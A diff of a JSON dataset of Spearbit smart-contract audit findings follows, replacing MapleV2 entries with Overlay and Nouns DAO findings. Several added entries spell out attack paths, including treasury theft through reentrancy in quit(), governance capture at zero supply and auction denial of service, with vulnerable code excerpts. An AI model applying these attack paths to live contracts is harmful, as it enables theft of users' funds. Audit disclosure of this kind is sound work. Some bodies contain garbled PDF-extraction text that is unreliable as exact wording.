Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiLong,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); -= Math.min(oiShort,pos.oiCurrent(fraction, oiTotalOnSide, -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); -= Math.min(posCost, posDebt);", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "No deadline when liquidating a borrower's collateral", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "A loan's collateral is liquidated in the event of a late payment or if the pool delegate impairs a loan If the loan contains any amount of collateral (assuming it is different to the due to insolvency by the borrower. funds' asset), the liquidation process will attempt to sell the collateral at a discounted amount. Because a liquidation is considered active as long as there is remaining collateral in the liquidator contract, a user can knowingly liquidate all but 1 wei of collateral. As there is no incentive for others to liquidate this dust amount, it is up to the loan manager to incur the cost and responsibility of liquidating this amount before they can successfully call LoanManager.finishCollateralLiquidation().", + "title": "Confusing use of term burn", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function oiAfterFunding() contains a comment that it burns a portion of the contracts. The term burn can be confused with burning of OVL. The Overlay team clarified that: The total aggregate open interest outstanding (oiLong + oiShort) on the market decreases over time with funding. Theres no actual burning of OVL. function oiAfterFunding(...) ... { ... // Burn portion of all aggregate contracts (i.e. oiLong + oiShort) // to compensate protocol for pro-rata share of imbalance liability ... return (oiOverweightNow, oiUnderweightNow); }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Loan impairments can be unavoidably unfair for borrowers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "When a pool delegate impairs a loan, the loan's _nextPaymentDueDate will be set to the min of If the pool delegate later decides to remove the im- block.timestamp and the current _nextPaymentDueDate. pairment, the original _nextPaymentDueDate is restored to its correct value. The borrower can also remove an impairment themselves by making a payment. In this case, the _nextPaymentDueDate is not restored, which is always worse for the borrower. This can be unfair since the borrower would have to pay late interest on a loan that was never actually late (according to the original payment due date). Another related consequence is that a borrower can be liquidated before the original payment due date even passes (this is possible as long as the loan is impaired more than gracePeriod seconds away from the original due date).", + "title": "Document precondition for oiAfterFunding()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Function oiAfterFunding contains the following statement: uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; Nevertheless, if oiOverweightBefore < oiUnderweightBefore then statement will revert. Luckily, the update() function makes sure this isnt the case. function oiAfterFunding(uint256 oiOverweightBefore, uint256 oiUnderweightBefore, ...) ... { ... uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; // Could if oiOverweightBefore < oiUnderweightBefore ... } function update() public returns (Oracle.Data memory) { ... bool isLongOverweight = oiLong > oiShort; uint256 oiOverweight two uint256 oiUnderweight = isLongOverweight ? oiShort : the two (oiOverweight, oiUnderweight) = oiAfterFunding(oiOverweight, oiUnderweight, ...); ... = isLongOverweight ? oiLong : oiShort; // oiOverweight is the largest of the oiLong; // oiUnderweight is the smallest of ,! ,! }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "withdrawCover() vulnerable to reentrancy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "withdrawCover() allows for reentrancy and could be abused to withdraw below the minimum cover amount and avoid having to cover protocol insolvency through a bad liquidation or loan default. The moveFunds() function could transfer the asset amount to the recipient specified by the pool delegate. Some In this case, the pool delegate could reenter the tokens allow for callbacks before the actual transfer is made. withdrawCover() function and bypass the balance check as it is made before tokens are actually transferred. This can be repeated to empty out required cover balance from the contract. It is noted that the PoolDelegateCover contract is a protocol controlled contract, hence the low severity.", + "title": "Format numbers intelligibly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Solidity offers several possibilities to format numbers in a more readable way as noted below.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Bad parameter encoding and deployment when using wrong initializers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The initializers used to encode the arguments, when deploying a new pool in PoolDeployer, might not be the initializers that the proxy factory will use for the default version and might lead to bad parameter encoding & deployments if a wrong initializer is passed.", + "title": "Any signer can cancel a pending/active proposal to grief the proposal process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Any proposal signer, besides the proposer, can cancel the proposal later irrespective of the number of votes they contributed earlier towards the threshold. The signer could even have zero votes because getPrior- Votes(signer,..) is not checked for a non-zero value in verifySignersCanBackThisProposalAndCountTheir- Votes() as part of the proposeBySigs() flow. This seems to be a limitation of the design described in hackmd.io/@el4d/nouns-dao-v3-spec#Cancel. With the signature-based scheme, every signer is as powerful as the proposer. As long as their combined votes meets threshold, it does not matter who contributed how much to the voting power. And assuming everyone contributed some non-zero power, they are all given the cancellation capability. However, for example, a signer/proposer with 0 voting power is treated on par with any other signer who contributed 10 Nouns towards meeting the proposal threshold. A malicious signer can sign-off on every valid proposal to later cancel it. The vulnerability arises from a lack of voting power check on signer and the cancel capability given to any signer. Example scenario: Evil, without having to own a single Noun, creates a valid signature to back every signature- based proposal from a different account (to bypass checkNoActiveProp()) and gets it included in the proposal creation process via proposeBySigs(). Evil then cancels every such proposal at will, i.e. no signature-based proposal that Evil manages to get included into, potentially all of them, will ever get executed. Impact: This allows a malicious griefing signer who could really be anyone without having to own any Nouns but manages to get their signature included in the proposeBySigs() to cancel that proposal later. This effectively gives anyone a veto power on all signature-based proposals. High likelihood + Medium impact = High severity. Likelihood is High because anyone with no special ownership (of Nouns) or special roles in the protocol frontend could initiate a signature to be accepted by the proposer. We assume no other checks by e.g. because those are out-of-scope, not specified/documented, depend on the implementation, depend on their trust/threat models or may be bypassed with protocol actors interacting directly with the contracts. We cannot be sure of how the proposer decides on which signatures to include and what checks are actually made, be- cause that is done offchain. Without that information, we are assuming that proposer includes all signatures they receive. Impact is Medium because, with the Likelihood rationale, anyone can get their signature included to later cancel a signature-backed proposal, which in the worst case (again without additional checks/logic) gives anyone a veto power on all signature-based proposals to potentially bring governance to a standstill if sig- natures are expected to be the dominant approach forward. Even if we assume that a proposer learns to exclude a zero-vote cancelling signer (with external checks) after experiencing this griefing, the signer can move on to other unsuspecting proposers. Given that this is one of the key features of V3 UX, we reason that this permissionless griefing DoS on governance to be at Medium impact. While the cancellation capability is indeed specified as the intended design, we reason that this is a risky feature for the reasons explained above. This should ideally be determined based only on the contributing voting power as suggested in our recommendation. Filtering out signers with zero voting power raises the bar from the current situation in requiring signers to have non-zero voting power (i.e. cost of griefing attack becomes non-zero) but will not prevent signers from transferring their voting power granting Noun(s) to other addresses, get new valid signatures included on other signature-based proposals and grief them later by cancelling. Equating a non-zero voting power to a veto power on all signature-based proposals in the protocol continues to be very risky.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: High Risk" ] }, { - "title": "Event LoanClosed might be emitted with the wrong value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "In function closeLoan function, the fees are got by the getClosingPaymentBreakdown function and it is not adding refinances fees after in code are paid all fee by payServiceFees which may include refinances fees. The event LoanClose might be emitted with the wrong fee value.", + "title": "Potential Denial of Service (DoS) attack on NounsAuctionHouseFork Contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The potential vulnerability arises during the initialization of the NounsAuctionHouseFork contract, which is deployed and initialized via the executeFork() function when a new fork is created. At this stage, the state variable startNounId within the NounsTokenFork contract is set corresponding to the nounId currently being auctioned in the NounsAuctionHouse. It should be noted that the NounsAuctionHouseFork contract is initially in a paused state and requires a successful proposal to unpause it, thus enabling the minting of new nouns tokens within the fork. Based on the current structure, an attacker can execute a DoS attack through the following steps: 7 1. Assume the executeFork() threshold is 7 nouns and the attacker owns 8 nouns. The current nounId being auctioned is 735. 2. The attacker places the highest bid for nounId 735 in the NounsAuctionHouse contract and waits for the auction's conclusion. 3. Once the auction concludes, the attacker calls escrowToFork() with his 8 nouns, triggering the execute- Fork() threshold. 4. Upon invoking executeFork(), new fork contracts are deployed. Below is the state of both NounsAuction- HouseFork and NounsAuctionHouse contracts at this juncture: NounsAuctionHouseFork state: nounId -> 0 amount -> 0 startTime -> 0 endTime -> 0 bidder -> 0x0000000000000000000000000000000000000000 settled -> false NounsAuctionHouse state: nounId -> 735 amount -> 50000000000000000000 startTime -> 1686014675 endTime -> 1686101075 bidder -> 0xE6b3367318C5e11a6eED3Cd0D850eC06A02E9b90 (attacker's address) settled -> false 5. The attacker executes settleCurrentAndCreateNewAuction() on the NounsAuctionHouse contract, thereby acquiring the nounId 735. 6. Following this, the attacker invokes joinFork() on the main DAO and joins the fork with nounId 735. This action effectively mints nounId 735 within the fork and subsequently triggers a DoS state in the NounsAuc- tionHouseFork contract. 7. At a later time, a proposal is successfully passed and the unpause() function is called on the NounsAuction- HouseFork contract. 8. A revert occurs when the _createAuction() function tries to mint tokenId 735 in the fork (which was already minted during the joinFork() call), thus re-pausing the contract. More broadly, this could happen if the buyer of the fork DAO's startNounId (and successive ones) on the original DAO (i.e. the first Nouns that get auctioned after a fork is executed) joins the fork with those tokens, even without any malicious intent, before the fork's auction is unpaused by its governance. Applying of delayed governance on fork DAO makes this timing-based behavior more feasible. One has to buy one or more of the original DAO tokens auctioned after the fork was executed and use them to join the fork immediately. The NounsAuctionHouseFork contract gets into a DoS state, necessitating a contract update in the NounsToken- Fork contract to manually increase the _currentNounId state variable to restore the normal flow in the NounsAuc- tionHouseFork. High likelihood + Medium impact = High Severity. Likelihood: High, because its a very likely scenario to happen, even unintentionally, the scenario can be triggered by a non-malicious user that just wants to join the fork with a fresh bought Noun from the auction house. Impact: Medium, because forking is bricked for at least several weeks until the upgrade proposal passes and is in place. This is not simply having a contract disabled for a period of time, this can be considered as a loss of assets for the Forked DAO as well, i.e. imagine that the Forked DAO needs funding immediately. On top of this, the contract upgrade would have to be done on the NounsTokenFork contract to correct the _currentNounId state variable to a valid value and fix the Denial of Service in the NounsAuctionHouseFork. Would the fork joiners be willing to perform such a risky update in such a critical contract?", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: High Risk" ] }, { - "title": "Bug in makePayment() reverts when called with small amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "When makePayment() is called with an amount which is less than the fees payable, then the trans- action will always revert, even if there is an adequate amount of drawable funds. The revert happens due to an underflow in getUnaccountedAmount() because the token balance is decremented on the previous line without updating drawable funds.", + "title": "Total supply can be low down to zero after the fork, allowing for execution of exploiting proposals from any next joiners", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Total supply can be low down to reaching zero during forking period, so any holder then entering forked DAO with joinFork() can push manipulating proposals and force all the later joiners either to rage quit or to be exploited. As an example, if there is a group of nouns holders that performed fork for pure financial reasons, all claimed forked nouns and quitted. Right after that it is block.timestamp < forkingPeriodEndTimestamp, so isForkPe- riodActive(ds) == true in original DAO contract. In the same time forked token's adjustedTotalSupply is zero (all new tokens were sent to timelock): NounsDAOLogicV1Fork.sol#L201-L208 function quit(uint256[] calldata tokenIds) external nonReentrant { ... for (uint256 i = 0; i < tokenIds.length; i++) { >> nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } NounsDAOLogicV1Fork.sol#L742-L744 function adjustedTotalSupply() public view returns (uint256) { return nouns.totalSupply() - nouns.balanceOf(address(timelock)); } Also, NounsTokenFork.remainingTokensToClaim() == 0, so checkGovernanceActive() check does not revert in the forked DAO contract: NounsDAOLogicV1Fork.sol#L346-L349) function checkGovernanceActive() internal view { if (block.timestamp < delayedGovernanceExpirationTimestamp && nouns.remainingTokensToClaim() > ,! 0) revert WaitingForTokensToClaimOrExpiration(); } Original DAO holders can enter new DAO with joinFork() only, that will keep checkGovernanceActive() non- reverting in the forked DAO contract: 9 NounsDAOV3Fork.sol#L139-L158 function joinFork( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, uint256[] calldata proposalIds, string calldata reason ) external { ... for (uint256 i = 0; i < tokenIds.length; i++) { ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]); } >> NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds); emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason); } As remainingTokensToClaim stays zero as claimDuringForkPeriod() doesn't affect it: NounsTokenFork.sol#L166-L174 function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external { if (msg.sender != escrow.dao()) revert OnlyOriginalDAO(); if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); for (uint256 i = 0; i < tokenIds.length; i++) { uint256 nounId = tokenIds[i]; _mintWithOriginalSeed(to, nounId); } } In this situation both quorum and proposal thresholds will be zero, proposals can be created with creationBlock = block.number, at which only recently joined holder have voting power: NounsDAOLogicV1Fork.sol#L242-L305 function propose( address[] memory targets, uint256[] memory values, string[] memory signatures, bytes[] memory calldatas, string memory description ) public returns (uint256) { checkGovernanceActive(); ProposalTemp memory temp; temp.totalSupply = adjustedTotalSupply(); >> temp.proposalThreshold = bps2Uint(proposalThresholdBPS, temp.totalSupply); require( nouns.getPriorVotes(msg.sender, block.number - 1) > temp.proposalThreshold, 'NounsDAO::propose: proposer votes below proposal threshold' ); ... newProposal.proposalThreshold = temp.proposalThreshold; newProposal.quorumVotes = bps2Uint(quorumVotesBPS, temp.totalSupply); ... newProposal.creationBlock = block.number; >> >> >> 10 DeployDAOV3NewContractsBase.s.sol#L18-L23 contract DeployDAOV3NewContractsBase is Script { ... uint256 public constant FORK_DAO_PROPOSAL_THRESHOLD_BPS = 25; // 0.25% uint256 public constant FORK_DAO_QUORUM_VOTES_BPS = 1000; // 10% This will give the first joiner the full power over all the later joiners: NounsDAOLogicV1Fork.sol#L577-L589 function castVoteInternal( address voter, uint256 proposalId, uint8 support ) internal returns (uint96) { ... /// @notice: Unlike GovernerBravo, votes are considered from the block the proposal was created >> in order to normalize quorumVotes and proposalThreshold metrics ,! uint96 votes = nouns.getPriorVotes(voter, proposal.creationBlock); Say if Bob, the original nouns DAO holder with 1 noun, joined when total supply was zero, he can create proposals and with regard for these proposals his only vote will be 100% of the DAO voting power. Bob can create a proposal to transfer all the funds to himself or a hidden malicious one like shown in Fork escrowers can exploit the fork or force late joiners to quit step 6. All the later joiners will not be able to stop this proposal, no matter how big their voting power be, as votes will be counted as on block where Bob had 100% of the votes. As the scenario above is a part of expected workflow (i.e. all fork initiators can be reasonably expected to quit fast enough), the probability of it is medium, while the probability of inattentive late joiners being exploited by Bob's proposal is medium too (there is not much time to react and some holders might first of all want to explore new fork functionality), so overall probability is low, while the impact is full loss of funds for such joiners. Per low combined likelihood and high impact setting the severity to be medium.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Pool.previewWithdraw always reverts but Pool.withdraw can succeed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The Pool.previewWithdraw => PM. previewWithdraw => WM.previewWithdraw function call se- quence always reverts in the WithdrawalManager. However, the Pool.withdraw function can succeed. This behavior might be unexpected, especially, as integrators call previewWithdraw before doing the actual withdraw call.", + "title": "Duplicate ERC20 tokens will send a greater than prorata token share leading to loss of DAO funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "_setErc20TokensToIncludeInFork() is an admin function for setting ERC20 tokens that are used when splitting funds to a fork. However, there are no sanity checks for duplicate ERC20 tokens in the erc20tokens parameter. While STETH is the only ERC20 token applicable for now, it is conceivable that DAO treasury may include others in future. The same argument applies to _setErc20TokensToIncludeInQuit() and members quitting from the fork DAO. Duplicate tokens in the array will send a greater than prorata share of those tokens to the fork DAO treasury in sendProRataTreasury() or to the quitting member in quit(). This will lead to loss of funds for the original DAO and fork DAO respectively. Low likelihood + High impact = Medium severity. 12", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Setting a new WithdrawalManager locks funds in old one", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The WithdrawalManager only accepts calls from a PoolManager. When setting a new withdrawal manager with PoolManager.setWithdrawalManager, the old one cannot be accessed anymore. Any user shares locked for withdrawal in the old one are stuck.", + "title": "A malicious proposer can create arbitrary number of maliciously updatable proposals to signifi- cantly grief the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "checkNoActiveProp() is documented as: \"This is a spam protection mechanism to limit the num- ber of proposals each noun can back.\" However, this mitigation applies to proposer addresses holding Nouns but not the Nouns themselves because checkNoActiveProp() relies on checking the state of proposals tracked by proposer via latestProposalId = ds.latestProposalIds[proposer]. A malicious proposer can move (trans- fer/delegate) their Noun(s) to different addresses for circumventing this mitigation and create proposals from those new addresses to spam. Furthermore, proposal updation in the protocol does not check for the proposer meeting any voting power threshold at the time of updation. A malicious proposer can create arbitrary number of proposals, each from a different address by transferring/delegating their Nouns, and then update any/all of them to be malicious. Substantial effort will be required to differentiate all such proposals from the authentic ones and then cancel them, leading to DAO governance DoS griefing. Medium likelihood + Medium impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Use whenProtocolNotPaused on migrate() instead of upgrade() for more complete protection", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "whenProtocolNotPaused is added to migrate() for the Liquidator, MapleLoan, and Withdrawal- Manager contracts in order to protect the protocol by preventing it from upgrading while the protocol is paused. However, this protection happens only during upgrade, and not during instantiation.", + "title": "A malicious proposer can update proposal past inattentive voters to sneak in otherwise unaccept- able details", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Updatable proposal description and transactions is a new feature being introduced in V3 to improve the UX of the proposal flow to allow proposal editing on-chain. The motivation for this feature as described in the spec is: \"Proposals get voter feedback almost entirely only once they are on-chain. At the same time, proposers are relunctant to cancel and resubmit their proposals for multiple reasons, e.g. prefering to avoid restarting the proposal lifecycle and thus delay funding.\" However, votes are bound only to the proposal identifier and not to their description (which describes the motiva- tion/intention/usage etc.) or the transactions (values transferred, contracts/functions of interaction etc.). Inattentive voters may (decide to) cast their votes based on a stale proposal's description/transactions which could since have been updated. For example, someone voting Yes on the initial proposal version may vote No if they see the updated details. A very small voting delay (MIN_VOTING_DELAY is 1 block) may even allow a malicious proposer to sneak in a malicious update at the very end of the updatable period so that voters do not see it on time to change their votes being cast. Delays in front-ends updating the proposal details may contribute to this scenario. A malicious proposer updates proposal with otherwise unacceptable txs/description to get support of inattentive voters who cast their votes based on acceptable older proposal versions. Malicious proposal passes to transfer a significant amount of treasury to unauthorized receivers for unacceptable reasons. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Missing post-migration check in PoolManager.sol could result in lost funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The protocol employs an upgradeable/migrateable system that includes upgradeable initializers for factory created contracts. For the most part, a storage value that was left uninitialized due to an erroneous initializer would not be affect protocol funds. For example forgetting to initialize _locked would cause all nonReentrant functions to revert, but no funds lost. However, if the poolDelegateCover address were unset and depositCover() were called, the funds would be lost as there is no to != address(0) check in transferFrom.", + "title": "NounsDAOLogicV1Fork's quit() performing external calls in-between total supply and balance reads can allow for treasury funds stealing via cross-contract reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Let's suppose there is an initiative group of nouns holders that performed fork, claimed is block.timestamp < and immediately quitted (say for pure financial Right after forkingPeriodEndTimestamp, so isForkPeriodActive(ds) == true in original DAO contract, while NounsTokenFork.remainingTokensToClaim() == 0, so checkGovernanceActive() doesn't revert in the forked DAO contract, which have no material holdings. reasons). that it For simplicity let's say there is Bob and Alice, both aren't part of this group and still are in the original DAO, Bob have 2 nouns, Alice have 1, each nouns' share of treasury is 1 stETH and 100 ETH, erc20TokensToIncludeInQuit = [stETH]. All the above are going concern assumptions (a part of expected workflow), let's now have a low probability one: stETH contract was upgraded and now performs _beforetokentransfer() callback on every transfer to a destination address as long as it's a contract (i.e. it has a callback, for simplicity let's assume it behaves similarly 14 to ERC-721 safeTransfer). enough technical reason for such an upgrade. It doesn't make it malicious or breaks IERC20, let's just suppose there is a strong If Alice now decides to join this fork, Bob can steal from her: 1. Alice calls NounsDAOV3's joinFork(), 1 stETH and 100 ETH is transferred to NounsDAOLogicV1Fork: NounsDAOV3Fork.sol#L139-L158 function joinFork( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, uint256[] calldata proposalIds, string calldata reason ) external { if (!isForkPeriodActive(ds)) revert ForkPeriodNotActive(); INounsDAOForkEscrow forkEscrow = ds.forkEscrow; address timelock = address(ds.timelock); sendProRataTreasury(ds, ds.forkDAOTreasury, tokenIds.length, adjustedTotalSupply(ds)); for (uint256 i = 0; i < tokenIds.length; i++) { ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]); } NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds); emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason); } Alice is minted 1 forked noun: NounsTokenFork.sol#L166-L174) function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external { if (msg.sender != escrow.dao()) revert OnlyOriginalDAO(); if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); for (uint256 i = 0; i < tokenIds.length; i++) { uint256 nounId = tokenIds[i]; _mintWithOriginalSeed(to, nounId); } } 2. Bob transfers all to attack contract (cBob), that joins the DAO with 1 noun. Forked treasury is 2 stETH and 200 ETH, cBob and Alice both have 1 noun. 3. cBob calls quit() and reenters NounsDAOV3's joinFork() on stETH _beforetokentransfer() (and nothing else): NounsDAOLogicV1Fork.sol#L201-L222 15 function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; ,! bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); >> } uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } 4. cBob have joined fork with another noun, stETH transfer concludes. Forked treasury is 2 stETH and 300 ETH, while 1 stETH was just sent to cBob. 5. With quit() resumed, (address(timelock).balance * tokenIds.length) / totalSupply = (300 * 1) / 2 = 150 ETH is sent to cBob: NounsDAOLogicV1Fork.sol#L201-L222 function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; ,! bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } >> uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } 6. Forked treasury is 2 stETH and 150 ETH, cBob calls quit() again without reentering (say on zero original nouns balance condition), obtains 1 stETH and 75 ETH, the same is left for Alice. Bob stole 25 ETH from Alice. 16 Attacking function logic can be as simple as {quit() as long as there is forkedNoun on my balance, perform joinFork() on the callback as long as there is noun on my balance}. Alice lost a part of treasury funds. The scale of the steps above can be increased to drain more significant value in absolute terms. Per low likelihood and high principal funds loss impact setting the severity to be medium.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Globals.poolDelegates[delegate_].ownedPoolManager mapping can be overwritten", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The Globals.poolDelegates[delegate_].ownedPoolManager keeps track of a single pool manager for a pool delegate. It can happen that the same pool delegate is registered for a second pool manager and the mapping is overwritten, by calling PM.acceptPendingPoolDelegate -> Globals.transferOwnedPoolManager or Globals.activatePoolManager.", + "title": "A malicious DAO can mint arbitrary fork DAO tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The original DAO is assumed to be honest during the fork period which is reinforced in the protocol by preventing it from executing any malicious proposals during that time. Fork joiners are minted fork DAO tokens by the original DAO via claimDuringForkPeriod() which enforces the fork period on the fork DAO side. However, the notion of fork period is different on the fork DAO compared to the original DAO (as described in Issue 16), i.e. while original DAO excludes forkEndTimestamp from the fork period, fork DAO includes forkingPeriodEndTimestamp in its notion of the fork period. If the original DAO executes a malicious proposal exactly in the block at forkEndTimestamp which makes a call to claimDuringForkPeriod() to mint arbitrary fork DAO tokens then the proposal will succeed on the original DAO side because it is one block beyond its notion of fork period. The claimDuringForkPeriod() will succeed on the fork DAO side because it is in the last block in its notion of fork period. The original DAO therefore can successfully mint arbitrary fork DAO tokens which can be used to: 1) brick the fork DAO when those tokens are attempted to be minted via auctions later or 2) manipulate the fork DAO governance to steal its treasury funds. In PoS, blocks are exactly 12 seconds apart. With forkEndTimestamp = block.timestamp + ds.forkPeriod; and ds.forkPeriod now set to 7 days, forkEndTimestamp is exactly 50400 blocks (7*24*60*60/12) after the block in which executeFork() was executed. A malicious DAO can coordinate to execute such a proposal exactly in that block. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Pool withdrawals can be kept low by non-redeeming users", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "In the current pool design, users request to exit the pool and are scheduled for a withdrawal window in the withdrawal manager. If the pool does not have enough liquidity, their share on the available pool liquidity is proportionate to the total shares of all users who requested to withdraw in that withdrawal window. It's possible for griefers to keep the withdrawals artificially low by requesting a withdrawal but not actually withdraw- ing during the withdrawal window. These griefers are not penalized but their behavior leads to worse withdrawal amounts for every other honest user.", + "title": "Inattentive fork escrowers may lose funds to fork quitters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Fork escrowers already have their original DAO treasury pro rate funds transferred to the fork DAO treasury (when fork executes) and are expected to claimFromEscrow() after fork executes to mint their fork DAO tokens and thereby lay claim on their pro rata share of fork DAO treasury for governance or exiting. Inattentive fork escrowers who fail to do so will force a delayed governance of 30 days (currently proposed value) on the fork DAO and beyond that will allow fork DAO members to quit with a greater share of the fork DAO treasury because fork execution transfers all escrowers' original DAO treasury funds to fork DAO treasury. 18 Inattentive slow-/non-claiming fork escrowers may lose funds to quitters if they do not claim their fork DAO tokens before its governance is active in 30 days after fork executes. They will also be unaccounted for in DAO functions like quorum and proposal threshold. While we would expect fork escrowers to be attentive and claim their fork DAO tokens well within the delayed governance period, the protocol design can be more defensive of slow-/non-claimers by protecting their funds on the fork DAO from quitters. Low likelihood + High impact = Medium severity. Consider be", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "_getCollateralRequiredFor should round up", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The _getCollateralRequiredFor rounds down the collateral that is required from the borrower. This benefits the borrower.", + "title": "Upgrading timelock without transferring the nouns from old timelock balance will increase adjusted total supply", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "There is one noun on timelock V1 balance, and can be others as of migration time: etherscan.io/token/0x9c8ff314c9bc7f6e59a9d9225fb22946427edc03?a=0x0BC3807Ec262cB779b38D65b38158acC3bfedE10 Changing ds.timelock without nouns transfer will increase adjusted total supply: NounsDAOV3Fork.sol#L199-L201 function adjustedTotalSupply(NounsDAOStorageV3.StorageV3 storage ds) internal view returns (uint256) { return ds.nouns.totalSupply() - 